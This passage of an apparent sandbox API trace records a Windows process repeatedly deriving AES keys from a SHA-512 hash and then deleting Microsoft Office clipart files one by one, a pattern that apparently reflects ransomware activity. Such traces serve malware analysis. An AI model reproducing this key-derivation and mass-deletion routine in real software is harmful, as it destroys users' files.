_File=0x77ac1228) returned 0 [0203.077] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0203.077] CryptDestroyHash (hHash=0x9ad878) returned 1 [0203.077] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0203.081] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0203.081] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.081] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad178) returned 1 [0203.081] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.081] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.081] wcslen (_String="\\\\?\\") returned 0x4 [0203.209] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 1 [0203.209] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00334_.wmf")) returned 1 [0203.210] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0203.210] wcslen (_String="OK") returned 0x2 [0203.210] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.210] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.211] CryptDestroyKey (hKey=0x9ad178) returned 1 [0203.211] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0203.211] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0203.213] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0203.213] CryptHashData (hHash=0x9ad878, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.213] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad6b8) returned 1 [0203.213] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.213] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.213] wcslen (_String="\\\\?\\") returned 0x4 [0203.275] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 1 [0203.275] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00443_.wmf")) returned 1 [0203.277] CryptDestroyKey (hKey=0x9ad338) returned 1 [0203.277] wcslen (_String="OK") returned 0x2 [0203.277] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.277] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.277] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0203.277] CryptDestroyHash (hHash=0x9ad878) returned 1 [0203.277] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0203.279] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0203.279] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.279] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad538) returned 1 [0203.279] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.280] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.280] wcslen (_String="\\\\?\\") returned 0x4 [0203.319] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 1 [0203.320] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00513_.wmf")) returned 1 [0203.321] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0203.321] wcslen (_String="OK") returned 0x2 [0203.321] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.321] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.321] CryptDestroyKey (hKey=0x9ad538) returned 1 [0203.321] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0203.321] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0203.323] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0203.323] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.323] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad438) returned 1 [0203.323] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.323] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.323] wcslen (_String="\\\\?\\") returned 0x4 [0203.399] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 1 [0203.399] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00524_.wmf")) returned 1 [0203.401] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0203.401] wcslen (_String="OK") returned 0x2 [0203.401] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.401] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.401] CryptDestroyKey (hKey=0x9ad438) returned 1 [0203.401] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0203.401] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0203.404] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0203.404] CryptHashData (hHash=0x9ad778, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.404] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad778, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad678) returned 1 [0203.404] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.404] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.404] wcslen (_String="\\\\?\\") returned 0x4 [0203.414] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 1 [0203.414] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00526_.wmf")) returned 1 [0203.415] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0203.415] wcslen (_String="OK") returned 0x2 [0203.415] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.415] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.415] CryptDestroyKey (hKey=0x9ad678) returned 1 [0203.415] CryptDestroyHash (hHash=0x9ad778) returned 1 [0203.415] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0203.419] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0203.419] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.419] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad738) returned 1 [0203.419] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.419] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.419] wcslen (_String="\\\\?\\") returned 0x4 [0203.488] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 1 [0203.488] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00527_.wmf")) returned 1 [0203.489] CryptDestroyKey (hKey=0x9ad478) returned 1 [0203.489] wcslen (_String="OK") returned 0x2 [0203.489] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.489] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.489] CryptDestroyKey (hKey=0x9ad738) returned 1 [0203.489] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0203.489] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0203.492] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0203.492] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.492] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad2b8) returned 1 [0203.492] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.492] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.492] wcslen (_String="\\\\?\\") returned 0x4 [0203.497] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 1 [0203.497] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00546_.wmf")) returned 1 [0203.498] CryptDestroyKey (hKey=0x9ad138) returned 1 [0203.498] wcslen (_String="OK") returned 0x2 [0203.498] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.498] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.498] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0203.498] CryptDestroyHash (hHash=0x9ad238) returned 1 [0203.498] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0203.500] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0203.500] CryptHashData (hHash=0x9ad578, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.500] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad1f8) returned 1 [0203.500] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.500] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.500] wcslen (_String="\\\\?\\") returned 0x4 [0203.503] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 1 [0203.503] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00601_.wmf")) returned 1 [0203.505] CryptDestroyKey (hKey=0x9ad638) returned 1 [0203.505] wcslen (_String="OK") returned 0x2 [0203.505] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.505] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.505] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0203.505] CryptDestroyHash (hHash=0x9ad578) returned 1 [0203.505] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0203.507] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0203.507] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.507] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad638) returned 1 [0203.507] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.507] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.507] wcslen (_String="\\\\?\\") returned 0x4 [0203.520] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 1 [0203.520] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00602_.wmf")) returned 1 [0203.521] CryptDestroyKey (hKey=0x9ad578) returned 1 [0203.521] wcslen (_String="OK") returned 0x2 [0203.521] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.521] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.521] CryptDestroyKey (hKey=0x9ad638) returned 1 [0203.521] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0203.521] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0203.523] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0203.523] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.523] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad238) returned 1 [0203.523] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.523] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.523] wcslen (_String="\\\\?\\") returned 0x4 [0203.532] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 1 [0203.532] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00612_.wmf")) returned 1 [0203.533] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0203.533] wcslen (_String="OK") returned 0x2 [0203.533] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.533] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.533] CryptDestroyKey (hKey=0x9ad238) returned 1 [0203.533] CryptDestroyHash (hHash=0x9ad478) returned 1 [0203.533] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0203.540] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0203.540] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.540] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad4b8) returned 1 [0203.540] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.540] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.540] wcslen (_String="\\\\?\\") returned 0x4 [0203.651] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 1 [0203.651] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00623_.wmf")) returned 1 [0203.652] CryptDestroyKey (hKey=0x9ad438) returned 1 [0203.652] wcslen (_String="OK") returned 0x2 [0203.652] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.652] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.652] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0203.652] CryptDestroyHash (hHash=0x9ad838) returned 1 [0203.652] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0203.654] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0203.654] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.654] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad178) returned 1 [0203.654] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.655] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.655] wcslen (_String="\\\\?\\") returned 0x4 [0203.667] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 1 [0203.668] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00625_.wmf")) returned 1 [0203.669] CryptDestroyKey (hKey=0x9ad438) returned 1 [0203.669] wcslen (_String="OK") returned 0x2 [0203.669] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.669] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.669] CryptDestroyKey (hKey=0x9ad178) returned 1 [0203.669] CryptDestroyHash (hHash=0x9ad478) returned 1 [0203.669] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0203.671] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44486c | out: phHash=0x1d44486c) returned 1 [0203.671] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.671] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444870 | out: phKey=0x1d444870*=0x9ad538) returned 1 [0203.671] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.671] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.671] wcslen (_String="\\\\?\\") returned 0x4 [0203.688] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 1 [0203.688] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00636_.wmf")) returned 1 [0203.689] CryptDestroyKey (hKey=0x9ad738) returned 1 [0203.689] wcslen (_String="OK") returned 0x2 [0203.689] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.689] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.689] CryptDestroyKey (hKey=0x9ad538) returned 1 [0203.689] CryptDestroyHash (hHash=0x9ad178) returned 1 [0203.689] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0203.692] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0203.692] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.692] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad7b8) returned 1 [0203.692] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.692] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.692] wcslen (_String="\\\\?\\") returned 0x4 [0203.700] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 1 [0203.700] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00669_.wmf")) returned 1 [0203.701] CryptDestroyKey (hKey=0x9ad678) returned 1 [0203.701] wcslen (_String="OK") returned 0x2 [0203.701] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.701] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.701] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0203.702] CryptDestroyHash (hHash=0x9ad338) returned 1 [0203.702] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0203.704] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0203.704] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.704] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad678) returned 1 [0203.704] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.704] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.704] wcslen (_String="\\\\?\\") returned 0x4 [0203.785] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 1 [0203.785] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00681_.wmf")) returned 1 [0203.786] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0203.786] wcslen (_String="OK") returned 0x2 [0203.786] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.786] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.786] CryptDestroyKey (hKey=0x9ad678) returned 1 [0203.786] CryptDestroyHash (hHash=0x9ad138) returned 1 [0203.786] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0203.788] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0203.788] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.788] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad138) returned 1 [0203.788] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.788] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.788] wcslen (_String="\\\\?\\") returned 0x4 [0203.820] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF") returned 1 [0203.821] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00685_.wmf")) returned 1 [0203.825] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0203.825] wcslen (_String="OK") returned 0x2 [0203.825] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.825] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.825] CryptDestroyKey (hKey=0x9ad138) returned 1 [0203.825] CryptDestroyHash (hHash=0x9ad738) returned 1 [0203.825] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0203.847] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0203.847] CryptHashData (hHash=0x9ad578, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.847] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad1b8) returned 1 [0203.847] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.847] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.847] wcslen (_String="\\\\?\\") returned 0x4 [0203.851] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 1 [0203.852] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00687_.wmf")) returned 1 [0203.853] CryptDestroyKey (hKey=0x9ad678) returned 1 [0203.853] wcslen (_String="OK") returned 0x2 [0203.853] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.853] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.853] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0203.853] CryptDestroyHash (hHash=0x9ad578) returned 1 [0203.853] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 